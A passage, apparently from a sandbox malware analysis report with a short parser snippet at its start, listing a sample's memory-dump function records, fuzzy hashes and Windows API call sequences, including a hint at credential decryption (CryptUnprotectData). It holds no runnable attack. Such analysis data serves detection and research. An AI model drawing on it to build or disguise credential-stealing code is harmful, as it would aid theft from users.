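        print(f"record {idx}: {reason}")
```

Running it on the full report text (the page is the same layout, so the parser needs no changes) gives one line per flagged function; the API ID value "Local$AllocCryptDataFreeUnprotect" is kept in `fields`, so a second pass can group functions by that key to find every variant of the same routine across dumps.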
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =b$@zN
                                  • API String ID: 0-939165417
                                  • Opcode ID: 3d09591de9f2f74b3964e23c2c5e25cadf04b9a2357321f23c882c20c6cc569a
                                  • Instruction ID: 941524f58b18988f0b847b1fa56a1b97fe9161b01747afedc9ceeda88672d534
                                  • Opcode Fuzzy Hash: 3d09591de9f2f74b3964e23c2c5e25cadf04b9a2357321f23c882c20c6cc569a
                                  • Instruction Fuzzy Hash: 97B208F360C2049FE304AE2DEC8577ABBE9EBD4720F1A853DE6C4C7744E63598058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &G~$(hb
                                  • API String ID: 0-1867757542
                                  • Opcode ID: b9a9177e6c1d491f13d28b3e6f6f18084aa6bb4085b26c2b282a6d155a75c6da
                                  • Instruction ID: 41884dd94268706b30c547b2d387faba4a7f86a329d8e18cac4b858071a42381
                                  • Opcode Fuzzy Hash: b9a9177e6c1d491f13d28b3e6f6f18084aa6bb4085b26c2b282a6d155a75c6da
                                  • Instruction Fuzzy Hash: 35622AF360C2049FE3046E2DEC4567ABBEAEBD4720F2A463DE6C5C3744E93598058697
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd520bf671354cabc9d598ed3417c271107c080582d7354946872773b85be4f4
                                  • Instruction ID: 6e44540430453d5af42608a8445bbce28f4e7ede2969fa4e039df600a03acc7d
                                  • Opcode Fuzzy Hash: dd520bf671354cabc9d598ed3417c271107c080582d7354946872773b85be4f4
                                  • Instruction Fuzzy Hash: B081D3B3A082149FE300AE29DC4177AF7E5EF94720F1A493DEAC4C7380E6395D458B96
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a8cd54f76ef1b63723391dbbfdeccaba054b7cac4296f9694efeea5ffc085c6
                                  • Instruction ID: dcae840c88710933ccda202a83c2f12404768e769aca8c31b8b823d98c40cfe7
                                  • Opcode Fuzzy Hash: 0a8cd54f76ef1b63723391dbbfdeccaba054b7cac4296f9694efeea5ffc085c6
                                  • Instruction Fuzzy Hash: 257125F36083049FE3046E69ECD577AB7E9EF80320F1A463EEAC5C3744E97858458696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5c9c9d0b879530e2d7c7526107ade9c224945c6291fbea73feb46bcb0f93675b
                                  • Instruction ID: c4623d32bb1f5b11161272671e010e46ae1e694d959c2e72084cc7394504f831
                                  • Opcode Fuzzy Hash: 5c9c9d0b879530e2d7c7526107ade9c224945c6291fbea73feb46bcb0f93675b
                                  • Instruction Fuzzy Hash: D251CFF3D186249BE3146E28DC847AABAE5EB54721F1B463CDFD8937C0E979580086C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6dd019cef58863ba67ef72990bdf0a956cbc74175adf7d796a33dd4ee790ca16
                                  • Instruction ID: 9bdb403f00839328f0dd87c606be84437bf3f1d14b8b3d5a5e31c2f067e717ac
                                  • Opcode Fuzzy Hash: 6dd019cef58863ba67ef72990bdf0a956cbc74175adf7d796a33dd4ee790ca16
                                  • Instruction Fuzzy Hash: 5F51A5B3A086009FE744AE19DC8177AB7E5EFD4720F168A3DE9D4C7744DA3988018697
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 957f516320eba7acf7809aec71d9d793a614783476478861113a6ecd6c802df2
                                  • Instruction ID: f7175e089fdd8918944c41bc263adfe5b2ea893fbbb5a5e4be1a8cd0f6649c67
                                  • Opcode Fuzzy Hash: 957f516320eba7acf7809aec71d9d793a614783476478861113a6ecd6c802df2
                                  • Instruction Fuzzy Hash: BB5138F3A082085FE354BE2DDC4572AB7E5DB94720F0A8A3CDA89C7744E97658058782
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bfd7c1d8a4e296f432774cf928780c5db5b67c0cc9e8b3115dd9083d1fb35996
                                  • Instruction ID: 83aab052d63fc52b1976b9850d9d848ee0d495bae04949cf01c8d630f67b0c6f
                                  • Opcode Fuzzy Hash: bfd7c1d8a4e296f432774cf928780c5db5b67c0cc9e8b3115dd9083d1fb35996
                                  • Instruction Fuzzy Hash: CD515CF3A081049BF70C6E39EC5577ABBD6EBD4320F1A453DEB85C3788E93A59054289
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49124a3a8ef941fe8ae6f571beedce6733d3d6e51e19839944e7022502597ce9
                                  • Instruction ID: 0a1eebc4c4678bdcba8b5c07a67d2dbf38072309d60053b07c9099778d0562a1
                                  • Opcode Fuzzy Hash: 49124a3a8ef941fe8ae6f571beedce6733d3d6e51e19839944e7022502597ce9
                                  • Instruction Fuzzy Hash: 7F41CDB250C304AFE315AF69E885A7EFBE9FF85724F16482DE6C1C3610E67848408B57
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c4bfb138e9e67fb723d4a9e12543430e29c853364887e85cad796fb28f43ba94
                                  • Instruction ID: a4306376637a884a73541d081d31ef63f18e0cfc96b3fb241640853b12e4c857
                                  • Opcode Fuzzy Hash: c4bfb138e9e67fb723d4a9e12543430e29c853364887e85cad796fb28f43ba94
                                  • Instruction Fuzzy Hash: B0314BB364D611DBD340EA299CD027EB7EDAB84258F06082FD5C6D7220EA30481787D3
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00FC86AA
                                  • StrStrA.SHLWAPI(?,01B9E058), ref: 00FC86CF
                                  • lstrcpyn.KERNEL32(011E93D0,?,00000000), ref: 00FC86EE
                                  • lstrlen.KERNEL32(?), ref: 00FC8701
                                  • wsprintfA.USER32 ref: 00FC8711
                                  • lstrcpy.KERNEL32(?,?), ref: 00FC8727
                                  • StrStrA.SHLWAPI(?,01B9E088), ref: 00FC8754
                                  • lstrcpy.KERNEL32(?,011E93D0), ref: 00FC87B4
                                  • StrStrA.SHLWAPI(?,01B9DFE0), ref: 00FC87E1
                                  • lstrcpyn.KERNEL32(011E93D0,?,00000000), ref: 00FC8800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 3581a668bd452b33a1171873d3d87f00370cbb4046aec7910e3da5e52da8a885
                                  • Instruction ID: 40c399446a6133441e5c314e69c0c40f427bc8f5f02790544c8d9e4e10c97cd9
                                  • Opcode Fuzzy Hash: 3581a668bd452b33a1171873d3d87f00370cbb4046aec7910e3da5e52da8a885
                                  • Instruction Fuzzy Hash: E2F1AE72904118AFCB24DFE4DD48ADAB7F9EF48304F0045A9F91AE7245DB34AE41DBA1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1F9F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FB1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1FE3
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB200E
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB204D
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2075
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB2081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB20AC
                                  • lstrlen.KERNEL32(?), ref: 00FB20E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2104
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB2112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2139
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB216B
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB2177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB21A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB21D4
                                  • lstrlen.KERNEL32(?), ref: 00FB21EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB2218
